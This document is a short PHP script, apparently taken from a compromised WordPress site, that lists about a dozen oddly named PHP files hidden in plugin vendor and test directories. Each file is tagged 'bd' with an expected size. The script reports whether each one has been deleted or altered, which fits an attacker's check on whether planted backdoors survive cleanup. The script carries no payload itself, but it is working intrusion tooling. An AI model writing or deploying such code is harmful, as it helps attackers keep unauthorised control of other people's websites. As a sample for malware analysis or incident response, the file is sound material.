<?php   $r = '/home/lemagazi/www'; $x = ["/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/php-code-coverage/src/Report/Html/menu_reg.php"=>"bd@@1132858@@975",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Util/PHP/xmlrpc_wrappers.php"=>"bd@@1132859@@967",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/8.5.php"=>"bd@@1132861@@921",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Http/Message/lang_pl.php"=>"bd@@1132862@@875",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/php-code-coverage/src/Report/Html/Renderer/Template/js/imagebrowser.php"=>"bd@@1133215@@26",
"/wp-content/plugins/file-manager-advanced/application/library/codemirror/mode/haxe/mod_menu.php"=>"bd@@1132468@@1066",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Framework/MockObject/Stub/acc_inv_tmpl.php"=>"bd@@1133252@@903",
"/wp-content/languages/themes/files/2024/cache/2024/data/archive/v3/memcache.php"=>"bd@@1133253@@934",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Framework/roles_actions.php"=>"bd@@1133254@@956",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/sebastian/code-unit-reverse-lookup/src/member.php"=>"bd@@1133257@@898",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phar-io/manifest/src/frontpage.php"=>"bd@@1133258@@901"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 